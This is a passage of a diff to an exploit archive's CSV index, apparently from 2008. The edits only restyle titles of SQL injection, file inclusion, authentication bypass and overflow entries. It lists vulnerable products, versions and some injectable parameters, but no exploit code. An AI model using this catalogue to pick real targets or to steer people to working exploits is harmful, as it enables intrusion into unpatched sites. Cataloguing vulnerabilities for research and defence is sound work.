Vuln",2008-11-02,"Hussin X",php,webapps,0 6953,platforms/php/webapps/6953.txt,"Maran PHP Shop (prod.php cat) SQL Injection Vulnerability",2008-11-02,JosS,php,webapps,0 6954,platforms/php/webapps/6954.txt,"Maran PHP Shop (admin.php) Insecure Cookie Handling Vulnerability",2008-11-02,JosS,php,webapps,0 6955,platforms/php/webapps/6955.txt,"Joovili 3.1.4 Insecure Cookie Handling Vulnerability",2008-11-02,ZoRLu,php,webapps,0 -6956,platforms/php/webapps/6956.txt,"Apartment Search Script (RFU/XSS) Multiple Remote Vulnerabilities",2008-11-02,ZoRLu,php,webapps,0 +6956,platforms/php/webapps/6956.txt,"apartment search script (rfu/xss) Multiple Vulnerabilities",2008-11-02,ZoRLu,php,webapps,0 6957,platforms/php/webapps/6957.txt,"NetRisk <= 2.0 (XSS/SQL Injection) Remote Vulnerabilities",2008-11-02,StAkeR,php,webapps,0 6958,platforms/php/webapps/6958.txt,"Maran PHP Shop (prodshow.php) SQL Injection Vulnerability",2008-11-02,d3v1l,php,webapps,0 6960,platforms/php/webapps/6960.txt,"1st News (products.php id) Remote SQL Injection Vulnerability",2008-11-02,TR-ShaRk,php,webapps,0 -6961,platforms/php/webapps/6961.pl,"deV!Lz Clanportal [DZCP] <= 1.4.9.6 Blind SQL Injection Exploit",2008-11-02,n/a,php,webapps,0 +6961,platforms/php/webapps/6961.pl,"deV!Lz Clanportal [DZCP] <= 1.4.9.6 - Blind SQL Injection Exploit",2008-11-02,n/a,php,webapps,0 6962,platforms/php/webapps/6962.txt,"BosDev BosClassifieds (cat_id) SQL Injection Vulnerability",2008-11-03,ZoRLu,php,webapps,0 6963,platforms/windows/remote/6963.html,"Chilkat Crypt Activex Arbitrary File Creation/Execution PoC",2008-11-03,shinnai,windows,remote,0 6964,platforms/php/webapps/6964.txt,"Acc Real Estate 4.0 Insecure Cookie Handling Vulnerability",2008-11-03,Hakxer,php,webapps,0 @@ -6559,7 +6559,7 @@ id,file,description,date,author,platform,type,port 6996,platforms/php/webapps/6996.php,"PHPX 3.5.16 (news_id) Remote SQL Injection Exploit",2008-11-05,StAkeR,php,webapps,0 6997,platforms/php/webapps/6997.txt,"Pre Podcast Portal (Tour.php id) SQL Injection Vulnerability",2008-11-05,G4N0K,php,webapps,0 6998,platforms/php/webapps/6998.txt,"Pre Shopping Mall Insecure Cookie Handling Vulnerability",2008-11-05,G4N0K,php,webapps,0 -6999,platforms/php/webapps/6999.txt,"Pre Multi-Vendor Shopping Malls Multiple Remote Vulnerabilities",2008-11-05,G4N0K,php,webapps,0 +6999,platforms/php/webapps/6999.txt,"pre multi-vendor shopping malls Multiple Vulnerabilities",2008-11-05,G4N0K,php,webapps,0 7000,platforms/php/webapps/7000.txt,"Pre Classified Listings Insecure Cookie Handling Vulnerability",2008-11-05,G4N0K,php,webapps,0 7001,platforms/php/webapps/7001.txt,"DFLabs PTK <= 1.0 Local Command Execution Vulnerability",2008-11-05,ikki,php,webapps,0 7002,platforms/php/webapps/7002.txt,"Joomla Component Dada Mail Manager 2.6 RFI Vulnerability",2008-11-05,NoGe,php,webapps,0 @@ -6584,7 +6584,7 @@ id,file,description,date,author,platform,type,port 7021,platforms/php/webapps/7021.txt,"SoftComplex PHP Image Gallery 1.0 (Auth Bypass) SQL Injection Vuln",2008-11-06,Cyber-Zone,php,webapps,0 7022,platforms/php/webapps/7022.txt,"LoveCMS 1.6.2 Final Arbitrary File Delete Vulnerability",2008-11-06,cOndemned,php,webapps,0 7023,platforms/php/webapps/7023.txt,"DeltaScripts PHP Classifieds <= 7.5 (Auth Bypass) SQL Injection Vuln",2008-11-06,ZoRLu,php,webapps,0 -7024,platforms/php/webapps/7024.txt,"DeltaScripts PHP Links <= 1.3 (Auth Bypass) SQL Injection Vuln",2008-11-06,ZoRLu,php,webapps,0 +7024,platforms/php/webapps/7024.txt,"DeltaScripts PHP Links <= 1.3 - (Auth Bypass) SQL Injection Vulnerability",2008-11-06,ZoRLu,php,webapps,0 7025,platforms/php/webapps/7025.txt,"DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability",2008-11-06,ZoRLu,php,webapps,0 7026,platforms/php/webapps/7026.txt,"SoftComplex PHP Image Gallery (ctg) SQL Injection Vulnerability",2008-11-06,"Hussin X",php,webapps,0 7027,platforms/php/webapps/7027.txt,"Prozilla Software Directory (XSS/SQL) Multiple Vulnerabilities",2008-11-06,G4N0K,php,webapps,0 @@ -6616,7 +6616,7 @@ id,file,description,date,author,platform,type,port 7055,platforms/hardware/remote/7055.txt,"SpeedStream 5200 Authentication Bypass Config Download Vulnerability",2008-11-07,hkm,hardware,remote,0 7056,platforms/windows/remote/7056.rb,"GE Proficy Real Time Information Portal Credentials Leak Sniffer (meta)",2008-11-08,"Kevin Finisterre",windows,remote,0 7057,platforms/php/webapps/7057.pl,"MemHT Portal <= 4.0 Remote Code Execution Exploit",2008-11-08,Ams,php,webapps,0 -7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulnerabilities",2008-11-08,ZoRLu,php,webapps,0 +7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 (upload/xss) Multiple Vulnerabilities",2008-11-08,ZoRLu,php,webapps,0 7059,platforms/php/webapps/7059.txt,"Enthusiast 3.1.4 (show_joined.php path) Remote File Inclusion Vuln",2008-11-08,BugReport.IR,php,webapps,0 7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router (xslt) Denial of Service Vulnerability",2008-11-08,hkm,hardware,dos,0 7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Auth Bypass) SQL Injection Vuln",2008-11-08,d3b4g,php,webapps,0 @@ -6637,7 +6637,7 @@ id,file,description,date,author,platform,type,port 7077,platforms/php/webapps/7077.txt,"OTManager CMS 2.4 (Tipo) Remote File Inclusion Vulnerability",2008-11-10,Colt7r,php,webapps,0 7078,platforms/php/webapps/7078.txt,"Joomla Component JooBlog 0.1.1 (PostID) SQL Injection Vulnerability",2008-11-10,boom3rang,php,webapps,0 7079,platforms/php/webapps/7079.txt,"FREEsimplePHPguestbook (guestbook.php) Remote Code Execution Vulnerability",2008-11-10,GoLd_M,php,webapps,0 -7080,platforms/php/webapps/7080.txt,"Fresh Email Script 1.0 Multiple Remote Vulnerabilities",2008-11-10,Don,php,webapps,0 +7080,platforms/php/webapps/7080.txt,"fresh email script 1.0 Multiple Vulnerabilities",2008-11-10,Don,php,webapps,0 7081,platforms/php/webapps/7081.txt,"AJ ARTICLE Remote Authentication Bypass Vulnerability",2008-11-10,G4N0K,php,webapps,0 7082,platforms/php/webapps/7082.txt,"PHPStore Car Dealers Remote File Upload Vulnerability",2008-11-10,ZoRLu,php,webapps,0 7083,platforms/php/webapps/7083.txt,"PHPStore PHP Job Search Script Remote File Upload Vulnerability",2008-11-10,ZoRLu,php,webapps,0 @@ -6691,7 +6691,7 @@ id,file,description,date,author,platform,type,port 7134,platforms/php/webapps/7134.txt,"phpstore Wholesale (track.php?id) SQL Injection Vulnerability",2008-11-16,"Hussin X",php,webapps,0 7135,platforms/windows/local/7135.htm,"Opera 9.62 file:// Local Heap Overflow Exploit",2008-11-17,"Guido Landi",windows,local,0 7136,platforms/php/webapps/7136.txt,"mxCamArchive 2.2 Bypass Config Download Vulnerability",2008-11-17,ahmadbady,php,webapps,0 -7137,platforms/asp/webapps/7137.txt,"OpenASP <= 3.0 Blind SQL Injection Vulnerability",2008-11-17,StAkeR,asp,webapps,0 +7137,platforms/asp/webapps/7137.txt,"OpenASP <= 3.0 - Blind SQL Injection Vulnerability",2008-11-17,StAkeR,asp,webapps,0 7138,platforms/php/webapps/7138.txt,"E-topbiz AdManager 4 (group) Blind SQL Injection Vulnerability",2008-11-17,"Hussin X",php,webapps,0 7140,platforms/php/webapps/7140.txt,"FREEze Greetings 1.0 Remote Password Retrieve Exploit",2008-11-17,cOndemned,php,webapps,0 7141,platforms/asp/webapps/7141.txt,"Q-Shop 3.0 Remote XSS/SQL Injection Vulnerabilities",2008-11-17,Bl@ckbe@rD,asp,webapps,0 @@ -6749,7 +6749,7 @@ id,file,description,date,author,platform,type,port 7200,platforms/php/webapps/7200.txt,"PG Real Estate (Auth Bypass) SQL Injection Vulnerability",2008-11-23,ZoRLu,php,webapps,0 7201,platforms/php/webapps/7201.txt,"PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability",2008-11-23,ZoRLu,php,webapps,0 7202,platforms/php/webapps/7202.txt,"PG Job Site (poll_view_id) Blind SQL Injection Vulnerability",2008-11-23,ZoRLu,php,webapps,0 -7204,platforms/php/webapps/7204.txt,"MODx CMS <= 0.9.6.2 (RFI/XSS) Multiple Remote Vulnerabilities",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0 +7204,platforms/php/webapps/7204.txt,"modx cms <= 0.9.6.2 (rfi/xss) Multiple Vulnerabilities",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0 7205,platforms/php/webapps/7205.txt,"Goople Cms 1.7 Insecure Cookie Handling Vulnerability",2008-11-23,BeyazKurt,php,webapps,0 7206,platforms/php/webapps/7206.txt,"PHP Classifieds Script Remote Database Disclosure Vulnerability",2008-11-23,InjEctOr5,php,webapps,0 7207,platforms/windows/dos/7207.pl,"Nero ShowTime 5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC",2008-11-24,LiquidWorm,windows,dos,0 @@ -6759,21 +6759,21 @@ id,file,description,date,author,platform,type,port 7211,platforms/php/webapps/7211.php,"VideoScript 3.0 <= 4.0.1.50 - Official Shell Injection Exploit",2008-11-24,G4N0K,php,webapps,0 7212,platforms/php/webapps/7212.php,"VideoScript 3.0 <= 4.1.5.55 - Unofficial Shell Injection Exploit",2008-11-24,G4N0K,php,webapps,0 7213,platforms/windows/dos/7213.pl,"W3C Amaya 10.1 Web Browser (id) Remote Stack Overflow PoC",2008-11-24,r0ut3r,windows,dos,0 -7214,platforms/php/webapps/7214.txt,"FTPzik (XSS/LFI) Multiple Remote Vulnerabilities",2008-11-24,JiKo,php,webapps,0 -7215,platforms/php/webapps/7215.txt,"Bandwebsite 1.5 (SQL/XSS) Multiple Remote Vulnerabilities",2008-11-24,ZoRLu,php,webapps,0 +7214,platforms/php/webapps/7214.txt,"ftpzik (xss/lfi) Multiple Vulnerabilities",2008-11-24,JiKo,php,webapps,0 +7215,platforms/php/webapps/7215.txt,"bandwebsite 1.5 (sql/xss) Multiple Vulnerabilities",2008-11-24,ZoRLu,php,webapps,0 7216,platforms/php/webapps/7216.txt,"WebStudio CMS (index.php pageid) Blind SQL Injection Vulnerability",2008-11-24,"Glafkos Charalambous ",php,webapps,0 7217,platforms/php/webapps/7217.pl,"Quicksilver Forums <= 1.4.2 RCE Exploit (windows only)",2008-11-24,girex,php,webapps,0 -7218,platforms/php/webapps/7218.txt,"Nitrotech 0.0.3a (RFI/SQL) Multiple Remote Vulnerabilities",2008-11-24,Osirys,php,webapps,0 +7218,platforms/php/webapps/7218.txt,"nitrotech 0.0.3a (rfi/sql) Multiple Vulnerabilities",2008-11-24,Osirys,php,webapps,0 7219,platforms/windows/dos/7219.pl,"Total Video Player (vcen.dll) Remote off by one Crash Exploit",2008-11-24,Cnaph,windows,dos,0 7220,platforms/hardware/dos/7220.txt,"Siemens C450IP/C475IP Remote Denial of Service Vulnerability",2008-11-24,"sky & Any",hardware,dos,0 7221,platforms/php/webapps/7221.txt,"Pie Web M{a,e}sher 0.5.3 Multiple Remote File Inclusion Vulnerability",2008-11-24,NoGe,php,webapps,0 7222,platforms/php/webapps/7222.txt,"WebStudio eHotel (pageid) Blind SQL Injection Vulnerability",2008-11-25,"Hussin X",php,webapps,0 7223,platforms/php/webapps/7223.txt,"WebStudio eCatalogue (pageid) Blind SQL Injection Vulnerability",2008-11-25,"Hussin X",php,webapps,0 7224,platforms/php/webapps/7224.txt,"FAQ Manager 1.2 (categorie.php cat_id) SQL Injection Vulnerability",2008-11-25,cOndemned,php,webapps,0 -7225,platforms/php/webapps/7225.txt,"Pie Web M{a,e}sher Mod Rss 0.1 Remote File Inclusion Vulnerability",2008-11-25,ZoRLu,php,webapps,0 +7225,platforms/php/webapps/7225.txt,"pie web m{a,e}sher mod rss 0.1 - Remote File Inclusion Vulnerability",2008-11-25,ZoRLu,php,webapps,0 7226,platforms/windows/dos/7226.html,"Google Chrome Browser MetaCharacter URI Obfuscation Vulnerability",2008-11-25,"Aditya K Sood",windows,dos,0 -7227,platforms/php/webapps/7227.txt,"Chipmunk Topsites (Auth Bypass/XSS) Multiple Remote Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0 -7228,platforms/php/webapps/7228.txt,"Clean CMS 1.5 (Blind SQL Injection/XSS) Multiple Remote Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0 +7227,platforms/php/webapps/7227.txt,"chipmunk topsites (auth bypass/xss) Multiple Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0 +7228,platforms/php/webapps/7228.txt,"clean cms 1.5 (blind sql injection/xss) Multiple Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0 7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 (config_path) Remote File Inclusion Vulnerability",2008-11-25,ZoRLu,php,webapps,0 7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 (full_txt.php id) Blind SQL Injection Exploit",2008-11-25,JosS,php,webapps,0 7231,platforms/php/webapps/7231.txt,"fuzzylime cms 3.03 (track.php p) Local File Inclusion Vulnerability",2008-11-25,"Alfons Luja",php,webapps,0 @@ -6781,13 +6781,13 @@ id,file,description,date,author,platform,type,port 7233,platforms/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) File Upload Exploit",2008-11-25,cOndemned,php,webapps,0 7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ (view_snaps.php type) Blind SQL Injection Vulnerability",2008-11-25,Cyber-Zone,php,webapps,0 7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x (show_emp) Blind SQL Injection Vulnerability",2008-11-25,XaDoS,php,webapps,0 -7236,platforms/php/webapps/7236.txt,"WebStudio CMS (pageid) Remote Blind SQL Injection Vuln (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0 +7236,platforms/php/webapps/7236.txt,"WebStudio CMS - (pageid) Remote Blind SQL Injection Vulnerability (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0 7237,platforms/php/webapps/7237.txt,"CMS Ortus <= 1.13 Remote SQL Injection Vulnerability",2008-11-26,otmorozok428,php,webapps,0 7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro v.3 (umprof_status) Blind SQL Injection Vulnerability",2008-11-26,XaDoS,php,webapps,0 7239,platforms/php/webapps/7239.txt,"ParsBlogger (blog.asp wr) Remote SQL Injection Vulnerability",2008-11-26,"BorN To K!LL",php,webapps,0 7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 Remote Blind SQL Injection Vulnerability",2008-11-26,b3hz4d,php,webapps,0 7241,platforms/php/webapps/7241.txt,"TxtBlog (index.php m) Local File Inclusion Vulnerability",2008-11-27,"CWH Underground",php,webapps,0 -7242,platforms/php/webapps/7242.txt,"Web Calendar System 3.12/3.30 Multiple Remote Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0 +7242,platforms/php/webapps/7242.txt,"web calendar system 3.12/3.30 Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0 7243,platforms/php/webapps/7243.php,"Star Articles 6.0 Remote Blind SQL Injection exploit",2008-11-27,Stack,php,webapps,0 7244,platforms/php/webapps/7244.txt,"Ocean12 Contact Manager Pro (SQL/XSS/DDV) Multiple Vulnerabilities",2008-11-27,Pouya_Server,php,webapps,0 7245,platforms/php/webapps/7245.txt,"Ocean12 Membership Manager Pro Database Disclosure Vulnerability",2008-11-27,Pouya_Server,php,webapps,0 @@ -6800,17 +6800,17 @@ id,file,description,date,author,platform,type,port 7252,platforms/php/webapps/7252.txt,"Web Calendar 4.1 (Auth Bypass) SQL Injection Vulnerability",2008-11-27,Cyber-Zone,php,webapps,0 7253,platforms/php/webapps/7253.txt,"Booking Centre 2.01 (HotelID) Remote SQL Injection Vulnerability",2008-11-27,R3d-D3v!L,php,webapps,0 7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro (Auth Bypass) SQL Injection Vuln",2008-11-27,Cyber-Zone,php,webapps,0 -7255,platforms/php/webapps/7255.txt,"PageTree CMS 0.0.2 BETA 0001 Remote File Inclusion Vulnerability",2008-11-27,NoGe,php,webapps,0 +7255,platforms/php/webapps/7255.txt,"pagetree cms 0.0.2 beta 0001 - Remote File Inclusion Vulnerability",2008-11-27,NoGe,php,webapps,0 7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script (id) Remote SQL Injection Vulnerability",2008-11-27,The_5p3ctrum,php,webapps,0 7257,platforms/php/webapps/7257.txt,"BaSiC-CMS (index.php r) Remote SQL Injection Vulnerability",2008-11-27,Mr.SQL,php,webapps,0 7258,platforms/php/webapps/7258.txt,"Ocean12 FAQ Manager Pro Database Disclosure Vulnerability",2008-11-27,Stack,php,webapps,0 -7259,platforms/asp/webapps/7259.txt,"Comersus ASP Shopping Cart (DD/XSS) Multiple Remote Vulnerabilities",2008-11-27,Bl@ckbe@rD,asp,webapps,0 +7259,platforms/asp/webapps/7259.txt,"comersus asp shopping cart (dd/xss) Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,asp,webapps,0 7260,platforms/php/webapps/7260.txt,"BaSiC-CMS (acm2000.mdb) Remote Database Disclosure Vulnerability",2008-11-28,Stack,php,webapps,0 7261,platforms/php/webapps/7261.txt,"Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability",2008-11-28,"CWH Underground",php,webapps,0 7262,platforms/windows/dos/7262.pl,"Microsoft Office Communicator (SIP) Remote Denial of Service Exploit",2008-11-28,"Praveen Darshanam",windows,dos,0 7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability",2008-11-28,MrDoug,php,webapps,0 7264,platforms/windows/local/7264.txt,"Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)",2008-11-28,Abysssec,windows,local,0 -7265,platforms/php/webapps/7265.txt,"Web Calendar System <= 3.40 (XSS/SQL) Multiple Remote Vulnerabilities",2008-11-28,Bl@ckbe@rD,php,webapps,0 +7265,platforms/php/webapps/7265.txt,"web calendar system <= 3.40 (xss/sql) Multiple Vulnerabilities",2008-11-28,Bl@ckbe@rD,php,webapps,0 7266,platforms/php/webapps/7266.pl,"All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a (Auth Bypass) SQL Injection Vulnerability",2008-11-28,JiKo,php,webapps,0 7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 (index.php id) Blind SQL Injection Vulnerability",2008-11-28,The_5p3ctrum,php,webapps,0 @@ -6822,35 +6822,35 @@ id,file,description,date,author,platform,type,port 7275,platforms/asp/webapps/7275.txt,"ActiveVotes 2.2 (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 7276,platforms/asp/webapps/7276.txt,"Active Test 2.1 (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 7277,platforms/asp/webapps/7277.txt,"Active Websurvey 9.1 (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 -7278,platforms/asp/webapps/7278.txt,"Active Membership v 2 (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 -7279,platforms/asp/webapps/7279.txt,"eWebquiz v 8 (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 +7278,platforms/asp/webapps/7278.txt,"Active Membership 2 - (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 +7279,platforms/asp/webapps/7279.txt,"eWebquiz 8 - (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 7280,platforms/asp/webapps/7280.txt,"Active Newsletter 4.3 (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 -7281,platforms/asp/webapps/7281.txt,"Active Web Mail v 4 (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 +7281,platforms/asp/webapps/7281.txt,"Active Web Mail 4 - (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 7282,platforms/asp/webapps/7282.txt,"Active Trade 2 (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 7283,platforms/asp/webapps/7283.txt,"Active Price Comparison 4 (Auth Bypass) SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 7284,platforms/php/webapps/7284.txt,"PHP TV Portal 2.0 (index.php mid) SQL Injection Vulnerability",2008-11-29,Cyber-Zone,php,webapps,0 7285,platforms/php/webapps/7285.txt,"CMS Made Simple 1.4.1 Local File Inclusion Vulnerability",2008-11-29,M4ck-h@cK,php,webapps,0 7286,platforms/php/webapps/7286.txt,"OraMon 2.0.1 Remote Config File Disclosure Vulnerability",2008-11-29,ahmadbady,php,webapps,0 7287,platforms/asp/webapps/7287.txt,"ActiveVotes 2.2 (AccountID) Blind SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 -7288,platforms/asp/webapps/7288.txt,"Active Web Mail v 4 Blind SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 +7288,platforms/asp/webapps/7288.txt,"Active Web Mail 4 - Blind SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 7289,platforms/php/webapps/7289.txt,"Active Price Comparison 4 - (ProductID) Blind SQL Injection Vulnerability",2008-11-30,R3d-D3v!L,php,webapps,0 7290,platforms/php/webapps/7290.txt,"Active Bids 3.5 (ItemID) Blind SQL Injection Vulnerability",2008-11-29,Stack,php,webapps,0 7291,platforms/php/webapps/7291.pl,"OpenForum 0.66 Beta Remote Reset Admin Password Exploit",2008-11-29,"CWH Underground",php,webapps,0 7292,platforms/asp/webapps/7292.txt,"ASPThai.NET Forum 8.5 Remote Database Disclosure Vulnerability",2008-11-29,"CWH Underground",asp,webapps,0 -7293,platforms/asp/webapps/7293.txt,"Active Web Helpdesk v 2 (Auth Bypass) SQL Injection Vulnerability",2008-11-29,Cyber-Zone,asp,webapps,0 +7293,platforms/asp/webapps/7293.txt,"Active Web Helpdesk 2 - (Auth Bypass) SQL Injection Vulnerability",2008-11-29,Cyber-Zone,asp,webapps,0 7294,platforms/php/webapps/7294.pl,"Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit",2008-11-29,"CWH Underground",php,webapps,0 7295,platforms/asp/webapps/7295.txt,"Active Test 2.1 (QuizID) Blind SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 7296,platforms/windows/dos/7296.txt,"Itunes 8.0.2.20/Quicktime 7.5.5 (.mov File) Multiple Off By Overflow PoC",2008-11-30,"laurent gaffiĂ© ",windows,dos,0 7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 (rdp file) Buffer Overflow PoC",2008-11-30,Encrypt3d.M!nd,windows,dos,0 -7298,platforms/php/webapps/7298.txt,"Active Web Helpdesk v 2 (CategoryID) Blind SQL Injection Vulnerability",2008-11-30,Cyber-Zone,php,webapps,0 +7298,platforms/php/webapps/7298.txt,"Active Web Helpdesk 2 - (CategoryID) Blind SQL Injection Vulnerability",2008-11-30,Cyber-Zone,php,webapps,0 7299,platforms/php/webapps/7299.txt,"Active Photo Gallery 6.2 (Auth Bypass) SQL Injection Vulnerability",2008-11-30,R3d-D3v!L,php,webapps,0 -7300,platforms/php/webapps/7300.txt,"Active Price Comparison v 4 (ProductID) Blind SQL Injection Vulnerability",2008-11-30,R3d-D3v!L,php,webapps,0 +7300,platforms/php/webapps/7300.txt,"Active Price Comparison 4 - (ProductID) Blind SQL Injection Vulnerability",2008-11-30,R3d-D3v!L,php,webapps,0 7301,platforms/php/webapps/7301.txt,"Active Time Billing 3.2 (Auth Bypass) SQL Injection Vulnerability",2008-11-30,AlpHaNiX,php,webapps,0 -7302,platforms/php/webapps/7302.txt,"Active Business Directory v 2 Remote blind SQL Injection Vulnerability",2008-11-30,AlpHaNiX,php,webapps,0 +7302,platforms/php/webapps/7302.txt,"Active Business Directory 2 - Remote blind SQL Injection Vulnerability",2008-11-30,AlpHaNiX,php,webapps,0 7303,platforms/php/webapps/7303.txt,"Quick Tree View .NET 3.1 (qtv.mdb) Database Disclosure Vulnerability",2008-11-30,Cyber-Zone,php,webapps,0 7304,platforms/php/webapps/7304.pl,"KTP Computer Customer Database CMS Local File Inclusion Vulnerability",2008-11-30,"CWH Underground",php,webapps,0 7305,platforms/php/webapps/7305.txt,"KTP Computer Customer Database CMS Blind SQL Injection Vulnerability",2008-11-30,"CWH Underground",php,webapps,0 -7306,platforms/php/webapps/7306.txt,"Minimal Ablog 0.4 (SQL/FU/Bypass) Multiple Remote Vulnerabilities",2008-11-30,NoGe,php,webapps,0 +7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 (sql/fu/bypass) Multiple Vulnerabilities",2008-11-30,NoGe,php,webapps,0 7307,platforms/windows/dos/7307.txt,"Electronics Workbench (EWB File) Local Stack Overflow PoC",2008-11-30,Zigma,windows,dos,0 7308,platforms/php/webapps/7308.txt,"cpCommerce 1.2.6 (URL Rewrite) Input variable overwrite / Auth bypass",2008-11-30,girex,php,webapps,0 7309,platforms/windows/local/7309.pl,"Cain & Abel <= 4.9.24 - .RDP Stack Overflow Exploit",2008-11-30,SkD,windows,local,0 @@ -6869,7 +6869,7 @@ id,file,description,date,author,platform,type,port 7324,platforms/php/webapps/7324.txt,"Rapid Classified 3.1 (cldb.mdb) Database Disclosure Vulnerability",2008-12-02,CoBRa_21,php,webapps,0 7325,platforms/asp/webapps/7325.txt,"Codefixer MailingListPro (MailingList.mdb) Database Disclosure Vuln",2008-12-02,AlpHaNiX,asp,webapps,0 7326,platforms/asp/webapps/7326.txt,"Gallery MX 2.0.0 (pics_pre.asp ID) Blind SQL Injection Vulnerability",2008-12-03,R3d-D3v!L,asp,webapps,0 -7327,platforms/asp/webapps/7327.txt,"Calendar MX Professional 2.0.0 Blind SQL Injection Vulnerability",2008-12-03,R3d-D3v!L,asp,webapps,0 +7327,platforms/asp/webapps/7327.txt,"Calendar MX Professional 2.0.0 - Blind SQL Injection Vulnerability",2008-12-03,R3d-D3v!L,asp,webapps,0 7328,platforms/php/webapps/7328.pl,"Check New 4.52 (findoffice.php search) Remote SQL Injection Exploit",2008-12-03,"CWH Underground",php,webapps,0 7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit",2008-12-03,Encrypt3d.M!nd,windows,local,0 7330,platforms/multiple/dos/7330.c,"ClamAV < 0.94.2 (JPEG Parsing) Recursive Stack Overflow PoC",2008-12-03,"ilja van sprundel",multiple,dos,0 @@ -6879,26 +6879,26 @@ id,file,description,date,author,platform,type,port 7334,platforms/windows/local/7334.pl,"RadAsm <= 2.2.1.5 (.RAP File) WindowCallProcA Pointer Hijack Exploit",2008-12-03,DATA_SNIPER,windows,local,0 7335,platforms/php/webapps/7335.txt,"Multi SEO phpBB 1.1.0 (pfad) Remote File Inclusion Vulnerability",2008-12-03,NoGe,php,webapps,0 7336,platforms/php/webapps/7336.txt,"ccTiddly 1.7.4 (cct_base) Multiple Remote File Inclusion Vulnerabilities",2008-12-04,cOndemned,php,webapps,0 -7337,platforms/php/webapps/7337.txt,"Wbstreet 1.0 (SQL/DD) Multiple Remote Vulnerabilities",2008-12-04,"CWH Underground",php,webapps,0 +7337,platforms/php/webapps/7337.txt,"wbstreet 1.0 (sql/dd) Multiple Vulnerabilities",2008-12-04,"CWH Underground",php,webapps,0 7338,platforms/php/webapps/7338.txt,"User Engine Lite ASP (users.mdb) Database Disclosure Vulnerability",2008-12-04,AlpHaNiX,php,webapps,0 -7339,platforms/php/webapps/7339.txt,"Template Creature (SQL/DD) Multiple Remote Vulnerabilities",2008-12-04,ZoRLu,php,webapps,0 +7339,platforms/php/webapps/7339.txt,"template creature (sql/dd) Multiple Vulnerabilities",2008-12-04,ZoRLu,php,webapps,0 7340,platforms/asp/webapps/7340.txt,"Easy News Content Management (News.mdb) Database Disclosure Vuln",2008-12-04,BeyazKurt,asp,webapps,0 -7341,platforms/php/webapps/7341.txt,"lcxbbportal 0.1 Alpha 2 Remote File Inclusion Vulnerability",2008-12-04,NoGe,php,webapps,0 +7341,platforms/php/webapps/7341.txt,"lcxbbportal 0.1 alpha 2 - Remote File Inclusion Vulnerability",2008-12-04,NoGe,php,webapps,0 7342,platforms/php/webapps/7342.txt,"My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability",2008-12-04,cOndemned,php,webapps,0 7343,platforms/php/webapps/7343.txt,"Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln",2008-12-04,IRCRASH,php,webapps,0 7344,platforms/php/webapps/7344.txt,"Gravity GTD <= 0.4.5 (rpc.php objectname) LFI/RCE Vulnerability",2008-12-04,dun,php,webapps,0 7345,platforms/php/webapps/7345.txt,"BNCwi <= 1.04 Local File Inclusion Vulnerability",2008-12-04,dun,php,webapps,0 7346,platforms/php/webapps/7346.txt,"Multiple Membership Script 2.5 (id) SQL Injection 